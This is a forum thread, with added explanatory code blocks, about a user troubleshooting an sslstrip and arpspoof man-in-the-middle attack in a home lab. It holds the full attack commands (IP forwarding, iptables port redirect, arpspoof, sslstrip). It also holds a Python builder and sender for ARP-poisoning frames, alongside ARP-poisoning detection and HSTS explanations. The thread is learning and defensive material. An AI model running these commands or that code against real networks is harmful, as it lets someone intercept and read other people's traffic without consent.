LinuxQuestions.org
Linux - Wireless Networking: This forum is for the discussion of wireless networking in Linux.

Old 06-17-2017, 12:45 AM   #1
tabike
LQ Newbie
Registered: Jun 2017
Posts: 7
Rep: Reputation: Disabled
sslstrip & arpspoof


Hi
I'm trying to study sslstrip.
My attacker machine is a laptop running Fedora 25, using a wireless interface called wlo1.
My victim is a Windows 10 machine, IP 10.0.0.4.
Router IP = 10.0.0.138

I run the following on terminal 1:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 -i wlo1
sslstrip -l 8080 -a

I run the following on terminal 2:
arpspoof -i wlo1 -t 10.0.0.138 -r 10.0.0.4

I run the following on terminal 3:
arpspoof -i wlo1 -r 10.0.0.138 -t 10.0.0.4

I run the following on terminal 4:
tail -f sslstrip.log

*** more info
[test@localhost apps]$ sudo iptables -L INPUT
[sudo] password for test:
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp dpt:webcache
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
ACCEPT udp -- anywhere anywhere udp dpt:bootps
ACCEPT tcp -- anywhere anywhere tcp dpt:bootps
ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED
ACCEPT all -- anywhere anywhere
INPUT_direct all -- anywhere anywhere
INPUT_ZONES_SOURCE all -- anywhere anywhere
INPUT_ZONES all -- anywhere anywhere
DROP all -- anywhere anywhere ctstate INVALID
REJECT all -- anywhere anywhere reject-with icmp-host-prohibited



[test@localhost apps]$ sudo iptables -t nat -L PREROUTING
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
PREROUTING_direct all -- anywhere anywhere
PREROUTING_ZONES_SOURCE all -- anywhere anywhere
PREROUTING_ZONES all -- anywhere anywhere
REDIRECT tcp -- anywhere anywhere tcp dpt:http redir ports 8080



*** The problems are:
1. As soon as arpspoof is invoked, the browser on the victim machine is disconnected from the net.

2. Every now and then I see in the log file (the same output, in a loop):
Resolving host: work.charityengine.com ..
and more binary stuff.

any idea what is going on?
thanks.
 
Old 06-19-2017, 09:42 PM   #2
mralk3
Slackware Contributor
Registered: May 2015
Distribution: Slackware
Posts: 1,900
Rep: Reputation: 1050
Quote:
Originally Posted by tabike View Post
I run the following on terminal 2:
arpspoof -i wlo1 -t 10.0.0.138 -r 10.0.0.4

I run the following on terminal 3:
arpspoof -i wlo1 -r 10.0.0.138 -t 10.0.0.4
The -r switch makes it so you do not need a second terminal. It tells arpspoof to poison both ways automatically. So you only need to run it once. Be certain that one IP is the router/gateway of your LAN (or virtual network) and that the other is designated as the target with -t. So if 10.0.0.4 is the gateway, run this:
Code:
arpspoof -i wlo1 -t 10.0.0.138 -r 10.0.0.4
Using the command twice is redundant and is causing your machine to spam ARP requests, which can reliably take down any machine on a home LAN.

I suggest you take a look at the following:

http://resources.infosecinstitute.co...sing-sslstrip/

I also suggest that you flush all your firewall rules and start fresh with IP forwarding and port redirects, in case your existing firewall rules are interfering with the traffic.

Keep in mind that sslstrip can get you into a lot of trouble. Be sure you use it against machines on your own network, which are running software that you made or is designated for ethical penetration testing. If it is not your own network/machines, be certain you have permission.

Check out the following as well: https://www.owasp.org/index.php/OWAS...ectory_Project

Last edited by mralk3; 06-19-2017 at 09:44 PM.
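What the commands in the first post and the -r explanation above actually put on the wire, as an added example (not code from the thread or from dsniff): the two ARP replies of a two-way poison between the victim 10.0.0.4 and the gateway 10.0.0.138, built and decoded with the standard library. In dsniff's arpspoof, -r takes no argument and the last positional argument is the host whose address is claimed, so a single `arpspoof -i wlo1 -t <victim> -r <gateway>` sends both frames. The MAC addresses below are constructed placeholders; the attacker IP 10.0.0.16 is the one tabike later reports.

```python
# Added example, not code from the thread or from dsniff: the two ARP replies that a
# two-way poison (what arpspoof's -r flag does) puts on the wire between the victim
# 10.0.0.4 and the gateway 10.0.0.138. The MAC addresses are constructed placeholders.
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet II frame carrying the ARP reply '<sender_ip> is-at <sender_mac>',
    unicast to target_mac. Ethernet header (14) + ARP payload (28) = 42 bytes."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode=2 (reply)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame back into its fields (used to check what we built)."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP encoding")
    fmt_mac = lambda b: ":".join(f"{x:02x}" for x in b)
    fmt_ip = lambda b: ".".join(str(x) for x in b)
    return {
        "op": op,
        "sender_mac": fmt_mac(frame[22:28]), "sender_ip": fmt_ip(frame[28:32]),
        "target_mac": fmt_mac(frame[32:38]), "target_ip": fmt_ip(frame[38:42]),
    }


def poison_pair(attacker_mac, victim_ip, victim_mac, gateway_ip, gateway_mac):
    """The two frames of a bidirectional poison: tell the victim that the gateway's
    IP lives at the attacker's MAC, and tell the gateway the same about the victim's IP.
    arpspoof re-sends these periodically so neither ARP cache recovers."""
    to_victim = build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def send_frame(iface: str, frame: bytes) -> int:
    """Put a raw frame on the wire (Linux only, needs CAP_NET_RAW). Not called by default."""
    import socket
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        return s.send(frame)


if __name__ == "__main__":
    # Constructed addresses for the thread's lab: attacker 10.0.0.16, victim 10.0.0.4, gateway 10.0.0.138.
    to_victim, to_gateway = poison_pair("02:00:00:00:00:16", "10.0.0.4", "02:00:00:00:00:04",
                                        "10.0.0.138", "02:00:00:00:00:38")
    for name, frame in (("to victim", to_victim), ("to gateway", to_gateway)):
        print(name, len(frame), "bytes:", parse_arp(frame))
```

Note that the frames are unicast to each victim's real MAC rather than broadcast; that is why only the two poisoned hosts see them, and why the effect on the victim side shows up as the gateway IP mapping to the attacker's MAC in `arp -a`. With ip_forward on, the attacker then relays between the two, and only port-80 traffic is diverted to sslstrip by the REDIRECT rule.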
 
Old 06-20-2017, 01:10 AM   #3
tabike
LQ Newbie
Registered: Jun 2017
Posts: 7
Original Poster
Rep: Reputation: Disabled
Hi mralk3,
thanks a lot for your answer. I did flush all iptables rules and the browser no longer loses connectivity - I can browse freely.
But now I face the real issue: tail -f sslstrip.log does not show anything.

BTW, doing arp -a on the Windows machine shows that the physical address of the router (10.0.0.138) resembles that of the attacker machine (10.0.0.16).
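The `arp -a` check in the post above is the simplest host-side detection of this attack: two IP addresses (here the router 10.0.0.138 and the attacker 10.0.0.16) resolving to one MAC. The script below is an added example, not part of the thread, that automates that check over both the Windows `arp -a` layout and the Linux `ip neigh` layout; the neighbour-table text and the MAC addresses are constructed samples, not captured output.

```python
# Added example (not from the thread): flag ARP/neighbour-cache entries where several
# IPs share one unicast MAC, and in particular where the gateway's MAC is also claimed
# by another IP. Sample tables and MACs below are constructed for illustration.
import re
from collections import defaultdict

MAC_RE = re.compile(r"\b([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\b")
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

# Constructed sample of 'arp -a' on the Windows victim after poisoning.
SAMPLE_WINDOWS = """\
Interface: 10.0.0.4 --- 0x5
  Internet Address      Physical Address      Type
  10.0.0.16             02-00-00-00-00-16     dynamic
  10.0.0.138            02-00-00-00-00-16     dynamic
  10.0.0.255            ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed sample of 'ip neigh show' on a Linux host in the same state.
SAMPLE_LINUX = """\
10.0.0.138 dev wlo1 lladdr 02:00:00:00:00:16 REACHABLE
10.0.0.16 dev wlo1 lladdr 02:00:00:00:00:16 STALE
10.0.0.1 dev wlo1 lladdr 02:00:00:00:00:01 REACHABLE
"""


def parse_neighbor_table(text: str):
    """(ip, mac) pairs from any line that carries both; MACs normalised to aa:bb:cc:dd:ee:ff.
    Header lines and the Windows 'Interface:' line carry no MAC and are skipped."""
    entries = []
    for line in text.splitlines():
        ip, mac = IP_RE.search(line), MAC_RE.search(line)
        if ip and mac:
            entries.append((ip.group(1), mac.group(1).lower().replace("-", ":")))
    return entries


def is_unicast(mac: str) -> bool:
    # Low bit of the first octet set = group address (broadcast/multicast); those legitimately
    # appear for many IPs and must not be reported.
    return not (int(mac[:2], 16) & 1)


def shared_macs(entries):
    """mac -> [ips] for every unicast MAC that is claimed by more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in entries:
        if is_unicast(mac):
            by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_impersonators(entries, gateway_ip: str):
    """Other IPs currently mapped to the same MAC as the gateway. A non-empty result
    means the gateway entry has most likely been poisoned (or a proxy-ARP device answers
    for both, which is the false positive to rule out)."""
    gw_mac = dict(entries).get(gateway_ip)
    if gw_mac is None:
        return []
    return sorted(ip for ip, mac in entries if mac == gw_mac and ip != gateway_ip)


if __name__ == "__main__":
    for label, table in (("windows", SAMPLE_WINDOWS), ("linux", SAMPLE_LINUX)):
        entries = parse_neighbor_table(table)
        print(label, "shared:", shared_macs(entries),
              "gateway 10.0.0.138 also claimed by:", gateway_impersonators(entries, "10.0.0.138"))
```

The reverse check is also worth having on the attacker side of a lab: if the victim's cache shows the gateway at the attacker's MAC but the gateway's cache does not show the victim at that MAC, the return path is not poisoned and only one direction of traffic is visible.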
 
Old 06-20-2017, 01:14 AM   #4
tabike
LQ Newbie
Registered: Jun 2017
Posts: 7
Original Poster
Rep: Reputation: Disabled
Oops!
As soon as I posted the reply I saw it in sslstrip.log!
So it works for linuxquestions.org and does not work for any other site I tried. Should I look only for non-HTTPS sites? I thought (probably wrongly) that sslstrip should strip HTTPS to HTTP and let me see the conversation with HTTPS sites. Was I wrong? (Most sites use HTTPS, so there is not much to do with sslstrip if I'm limited to non-HTTPS sites) ...
 
Old 06-20-2017, 11:41 AM   #5
mralk3
Slackware Contributor
Registered: May 2015
Distribution: Slackware
Posts: 1,900
Rep: Reputation: 1050
Some sites have protections against SSLStrip. Some targets (victims) also have protections, such as browser add-ons like "HTTPS Everywhere". If a site is purely served using SSL/TLS, and nothing is clear text, it is difficult, if not impossible, to do an SSL/TLS downgrade attack. This is also the case if a site deploys "HTTP Strict Transport Security", or HSTS. For more information, Google the terms "protections against sslstrip".

Short answer: SSLstrip doesn't always work these days due to sites on the web using better security practices.
 
Old 06-20-2017, 10:53 PM   #6
tabike
LQ Newbie
Registered: Jun 2017
Posts: 7
Original Poster
Rep: Reputation: Disabled
I understand. When I removed google.com from the HSTS list in Chrome, sslstrip intercepted successfully.
Thanks a lot, mralk3.
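Post #5 explains that HSTS defeats the downgrade and post #6 confirms it by deleting google.com from Chrome's HSTS list. The following added example (not code from the thread or from sslstrip) shows both halves: the link rewrite sslstrip performs on a plaintext response, and a minimal model of a browser's HSTS store that upgrades http:// URLs for known hosts before they leave the machine, so the stripper never gets a plaintext request to rewrite. Hosts, URLs, timestamps and the sample page are constructed for illustration; treating preloaded hosts as covering subdomains is an assumption made here, not something the thread states.

```python
# Added example, not the thread's or sslstrip's own code: (1) the rewrite sslstrip
# applies to a plaintext HTTP response and (2) a minimal model of a browser's HSTS
# store, which is why clearing google.com from Chrome's HSTS list made the attack
# work. Hosts, URLs and the sample page are constructed for illustration.
import re

HTTPS_LINK = re.compile(rb"https://", re.IGNORECASE)


def strip_https(body: bytes) -> bytes:
    """sslstrip's core move: rewrite https:// links in a page the victim fetched over
    plain HTTP so the victim's next request is also plaintext and flows through the proxy
    (the proxy's own TLS connection to the real site is omitted here)."""
    return HTTPS_LINK.sub(b"http://", body)


def parse_hsts(header_value: str):
    """Strict-Transport-Security -> (max_age seconds or None, includeSubDomains)."""
    max_age, include_subdomains = None, False
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            max_age = int(value.strip().strip('"'))
        elif name == "includesubdomains":
            include_subdomains = True
    return max_age, include_subdomains


class HstsCache:
    """host -> (expiry timestamp, includeSubDomains). Preloaded hosts never expire and
    are treated as covering subdomains (an assumption made for this example)."""

    def __init__(self, preload=()):
        self.entries = {host: (float("inf"), True) for host in preload}

    def record(self, host: str, header_value: str, now: float, over_tls: bool) -> None:
        """Browsers only honour HSTS received over TLS, so a stripper sitting on the
        plaintext side cannot inject 'max-age=0' to evict an entry."""
        if not over_tls:
            return
        max_age, include_subdomains = parse_hsts(header_value)
        if max_age is None:
            return
        if max_age == 0:
            self.entries.pop(host, None)
        else:
            self.entries[host] = (now + max_age, include_subdomains)

    def forget(self, host: str) -> None:
        """Drop the host's entry by hand, as tabike did for google.com in Chrome."""
        self.entries.pop(host, None)

    def is_known(self, host: str, now: float) -> bool:
        """Exact match, or a live parent entry with includeSubDomains."""
        labels = host.split(".")
        for i in range(len(labels)):
            entry = self.entries.get(".".join(labels[i:]))
            if entry and entry[0] > now and (i == 0 or entry[1]):
                return True
        return False

    def outgoing_url(self, url: str, now: float) -> str:
        """The URL the browser actually sends: an http:// URL for a known host is
        upgraded before it leaves the machine, so the stripper never sees plaintext."""
        m = re.fullmatch(r"http://([^/:]+)(.*)", url)
        if m and self.is_known(m.group(1), now):
            return "https://" + m.group(1) + m.group(2)
        return url


if __name__ == "__main__":
    page = b'<a href="https://accounts.example.com/login">Sign in</a>'   # constructed sample page
    print(strip_https(page))
    cache = HstsCache(preload=["google.com"])
    print(cache.outgoing_url("http://www.google.com/", now=0))   # stays https: nothing to strip
    cache.forget("google.com")
    print(cache.outgoing_url("http://www.google.com/", now=0))   # now plaintext, strippable
```

Two practical consequences follow from the model: a host the victim has never visited over TLS and that is not preloaded is strippable on first contact, and an entry learnt dynamically stops protecting once max-age lapses, which is why sites are told to set it to a year or more and to apply for preloading.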
 
Old 06-20-2017, 10:59 PM   #7
mralk3
Slackware Contributor
Registered: May 2015
Distribution: Slackware
Posts: 1,900
Rep: Reputation: 1050
Quote:
Originally Posted by tabike View Post
I understand. When I removed google.com from the HSTS list in Chrome, sslstrip intercepted successfully.
Thanks a lot, mralk3.
Glad to help. Be careful with how you use sslstrip. I recommend setting up a virtual lab for your testing so you can play, as well as stay out of trouble. Damn Vulnerable Linux and Metasploitable are great for learning this stuff.
 
Old 06-20-2017, 11:36 PM   #8
tabike
LQ Newbie
Registered: Jun 2017
Posts: 7
Original Poster
Rep: Reputation: Disabled
Actually, I'm done with sslstrip for now. I'm now studying squid. I have just posted a question at: http://www.linuxquestions.org/questi...of-4175608292/
I'd be happy if you helped there too.

I will mark this thread as closed.
 
  


All times are GMT -5.